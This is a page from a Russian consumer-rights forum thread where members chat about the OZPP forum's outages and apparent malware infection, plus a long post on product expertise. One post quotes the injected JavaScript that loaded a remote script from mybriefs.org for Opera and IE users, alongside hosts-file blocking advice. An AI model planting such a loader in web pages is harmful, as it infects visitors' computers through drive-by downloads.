+ Ответить в теме
Страница 41 из 45
ПерваяПервая ... 31 39 40 41 42 43 ... ПоследняяПоследняя
Показано с 1,201 по 1,230 из 1331

Тема: Беженцы

  1. #1201
    Цитата Сообщение от valdisss Посмотреть сообщение
    ... долбежка эксперта будет при любом раскладе, она под протокол суда отказалась
    А вот в том то и беда что раз под протокол отказалась то и ответственности уже никакой нет.

  2. #1202
    Вот о каких-то начальных знаниях потребителя (и продавца тоже) об экспертизе, процессе ее проведения, о том, как должно выглядеть экспертное заключение, о том, какие вопросы правильно нужно ставить перед экспертом, о том, оплачивать ли потребителю или нет (и в каких случаях) экспертизу, которая проводится продавцом, как оспорить ее в суде и некоторые другие моменты хочу изложить в отдельной теме, о чем и спрашивала разрешение у администратора. Уже набросала многое. Нет времени сесть, отредактировать, "причесать" и отправить ему на "одобрямс" или "запрещамс".

  3. #1203
    Senior Member Аватар для valdisss
    Регистрация
    14.10.2013
    Адрес
    Ozyorsk, Chelyabinsk Region
    Сообщений
    113
    форум прямо на издыхании
    "С людями надо быть гибче, а на вопросы смотреть ширше..." (С)

  4. #1204
    Вы только указываете, чей Бобик сдох, а то у меня от испуга давление подскочило!
    Свободный художник

  5. #1205
    Цитата Сообщение от Евгений Мясин Посмотреть сообщение
    Вы только указываете, чей Бобик сдох, а то у меня от испуга давление подскочило!
    Евгений Борисович!
    Не волнуйтесь, все хорошо!
    Хотя сегодня почему - то и этот " Бобик" тормозил...
    А может, это мои проблемы ( в том плане, что была на работе, а там иногда такое бывает- проблемы со связью вообще).
    А вообще, мне Ваш форум нравится еще и тем, что Вы принимаете непосредственное участие в его работе и обсуждении ситуаций. Спасибо Вам за это.

  6. #1206
    Цитата Сообщение от Евгений Мясин Посмотреть сообщение
    Вы только указываете, чей Бобик сдох, а то у меня от испуга давление подскочило!
    Почему-то вспомнилось:

    Жена уезжает на курорт и наказывает мужу следить и ухаживать за своей мамой и кошкой.
    Звонит мужу с курорта узнать, как дома дела:
    - Ну как дела, дорогой? Как наша кошка?
    - Твоя кошка сдохла.
    - Какой ужас! Какой ты нетактичный! Надо было как то меня подготовить.
    - А как?
    - Ну, сказал бы, что она сидела на краю крыши, неловко повернулась, упала и разбилась. Понял?
    - Да.
    - Ну, а как там моя мама?
    - А твоя мама уже сидит на краю крыши...

    Владя, поаккуратнее!
    Лишимся и этой площадки

  7. #1207
    Татьяна, я Вам всегда рад и анекдот в тему.
    Валдиссса, простил. Поспал полтора часа, давление восстановил и снова в бой.
    Свободный художник

  8. #1208
    Цитата Сообщение от valdisss Посмотреть сообщение
    форум прямо на издыхании
    К гадалке не ходи "торгаши" жулики досят которым дорогу перешли , сейчас самое хлебное время , в январе должно полегче быть.

  9. #1209
    Senior Member Аватар для valdisss
    Регистрация
    14.10.2013
    Адрес
    Ozyorsk, Chelyabinsk Region
    Сообщений
    113
    Каюсь - когда писал это, то подумал, что могут возникнуть такие мысли у участников
    Просто я исходил из названия темы, а она относится к форуму озпп.

    Танюша, анекдот понравился

    Евгений Борисович, с форумом спрф пока ничего похожего не было, считаю априори - все хорошо
    "С людями надо быть гибче, а на вопросы смотреть ширше..." (С)

  10. #1210
    Цитата Сообщение от valdisss Посмотреть сообщение
    Евгений Борисович, с форумом спрф пока ничего похожего не было, считаю априори - все хорошо
    Шутка.
    http://www.youtube.com/watch?v=p29ksSAZtDY
    Цитата Сообщение от Евгений Мясин Посмотреть сообщение
    Вы только указываете, чей Бобик сдох, а то у меня от испуга давление подскочило!
    Евгений Борисович, в нашу тему не подготовленным лучше не заходить.
    Теперь уже с постоянно повторяющейся проблемой форума ОЗПП.
    Последний раз редактировалось Super Neo; 22.12.2013 в 22:34.

  11. #1211
    Похоже, форум ОЗПП снова заражен - 10минут назад пытался отправить там набранное сообщение, после чего броузер завис, а в диспетчере задач появился процесс 8989000.exe, сжирающий 200Мб памяти. При этом внизу в статусной строке броузера был виден запрос к какому-то длинному пути с окончанием .biz. К сожалению, не смог запомнить через скриншот, т.к. компьютер пришлось перегружать.

  12. #1212
    Senior Member Аватар для Электромеханик
    Регистрация
    11.10.2013
    Адрес
    http://forum.ozpp.ru/search.php?do=getdaily
    Сообщений
    231
    адреса "file.mybriefs.org" и "js.mybriefs.org" в блокировщик
    например, в hosts
    Код:
    0.0.0.0	js.mybriefs.org
    0.0.0.0	file.mybriefs.org
    очистить кэш браузера, пройтись по системному диску антивирусом

    ЗЫ
    заражают только ОПЕРУ И ИЕ
    Код:
    <script type="text/javascript">
    //<![CDATA[
     var ua = navigator.userAgent;
     var fsave = document.createElement("script");
     fsave.type = "text/javascript";
     fsave.src = "http://file.mybriefs.org/save.js";
     if(ua.search(/(opera|msie)/i) > -1 && ua.search(/(win)/i) > -1) {
      document.body.appendChild(fsave);
     }
    //]]>
    </script>
    пользуйтесь огненной лисой
    *лучше c аддоном NoScript
    Последний раз редактировалось Электромеханик; 24.12.2013 в 18:27.

  13. #1213
    Спасибо, Электромеханик - вроде помогло!
    Вы прям как в песне:
    "А один из них, механик,
    Рассказал, сбежав от нянек,
    Что Бермудский многогранник -
    Незакрытый пуп земли..." (с) - в смысле, не закрытые дыры в броузерах IE и Opera

  14. #1214
    Видите, Евгений Борисович (раз тут уж все равно стихийно образовалась флудилка), как мало имеют представлений об экспертизе наши потребители! Автор просит законов. Вы тему закрыли, я ей ответить не успела. Вот думаю, отправить или нет ответ в личку... Ведь найдет экспертную "Рога-копыта" (легко! ведь только деньги платите, а мы музыку сыграем!), потратит деньги, получит надежду, которая легко может смениться еще бОльшими разочарованиями во всем и вся...
    Добавьте в мой последний пост это, пожалуйста!
    Вы просите того, чего нет. О каких ссылках на законы по экспертизе речь? Возможность или невозможность что установить экспертно законам, писанным законотворцами, не подчиняется. Тут работают другие законы - химии, физики, биохимии и биофизики. И работают (или не работают!) они вне зависимости от запретов или велений человека. Можно установить - установят, невозможно - не смогут.

    В вашем случае установить можно лишь то, что изначальные свойства материалов и веществ необратимо утрачены. Почему - уже объяснила. Сравнить эти свойства с заданными не представляется возможным. И если даже кто-то возьмется это сделать, я бы не стала доверять такому специалисту. Уж сколько примеров на форумах недобросовестности экспертов. И ведь к ответу привлечь такого деятеля крайне трудно!

    Вы можете найти экспертную организацию, которая возьмется проводить такую экспертизу. Но при грамотном поведении продавца. проконсультируйся он с хорошим профессионалом, любые в этом случае выводы и доводы могут легко быть разбиты в суде.

    Даже если на экспертизу будет в качестве образца сравнения отправлена точно такая же юбка и даже если такой образец сравнения при химической неводной чистке поведет себя в отношении красителя недопустимо, вам поможет мало, практически никак! У вас претензии к качеству конкретно вашей вещи. Эта вещь уже подвержена недопустимой обработке. Другая партия товара - другой результат, который нельзя проецировать на вашу юбку.

    В условиях нашего рынка доказывать принадлежность к одной и той же партии - дело еще более сложное и порой бессмысленное, чем экспертировать юбку, которую постирали вы. У мелкооптовиков, как правило, вообще поставки партий не фиксируются.

    Время, деньги, нервы... Добрым советом для вас будет такой: прежде чем нести деньги на экспертизу, посоветуйтесь с экспертом. И лучше не с одним и не с двумя. Выслушайте, подумайте, взвесьте и оцените сказанное.

  15. #1215
    Я добавил.
    Свободный художник

  16. #1216
    Всем, привет!
    Форум ОЗПП только у меня не загружается?

  17. #1217
    У меня тоже упал.
    Я писал пост для тропинки в курилке. Написал только наполовину, хотел еще один прицепить.
    Если сейчас та половина выложилась в тему, там такой бред получится не читабельный.
    Хотя и целиком пост вряд ли достигнет цели.
    Последний раз редактировалось Brukner; 27.12.2013 в 13:49.

  18. #1218
    Сейчас попробовал немного с тормозами, форум заработал.

  19. #1219
    Цитата Сообщение от Brukner Посмотреть сообщение
    там такой бред получится не читабельный.
    У Вас получается...Как и получается перевирать смысл прочитанного...

  20. #1220
    Яндекс выдает, что открытие нашего сайта может угрожать безопасности компьютера или мобильного устройств. Это только у меня такое?

  21. #1221
    Это у всех так, я забил на предупреждение и заходил на форум.

  22. #1222
    Тоже самое.

  23. #1223
    Предупреждал-предупреждал, а теперь и вовсе не открывается

  24. #1224
    Ага только что пропал .
    Fatal error: Call to undefined method redistr::get() in /var/www/forum.ozpp.ru/vbforum.ozpp.ru/global.php on line 44

  25. #1225
    Да обновляли что-то и в коде ошиблись. Со всяким бывает.

  26. #1226
    Сайт ОЗПП опять завис? Точнее форум
    Свободный художник

  27. #1227
    Да. Завис опять.

  28. #1228
    А вот что мне показывают вместо форума (сайт работает):

    Последний раз редактировалось vovse_ne; 04.02.2014 в 12:41.

  29. #1229
    Senior Member Аватар для СветланаСми
    Регистрация
    12.12.2008
    Адрес
    Москва
    Сообщений
    158
    Здравствуйте все!
    У меня вчера форум резко прекратил работу, просто завис, показывал пустые страницы, но на паре страниц выдало ошибку 504. Никакие чистки куков и прочего картины не изменили. Через некоторое время стал выдавать 500-ю.
    А сегодня - ошибка 522.
    Последний раз редактировалось СветланаСми; 04.02.2014 в 12:53.

  30. #1230
    О чём я и пишу. При обычном заходе мне выдаётся то, что я прикрепила выше (с домашнего провайдера), при заходе через прокси и с мобильника идёт ошибка 522.

    Замечу: за несколько минут до того, как я разместила тут скриншот, форум работал (пусть и с тормозами), я оставила коммент в теме, перезагрузила страницу... и Опачки!..
    Последний раз редактировалось vovse_ne; 04.02.2014 в 13:10.

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения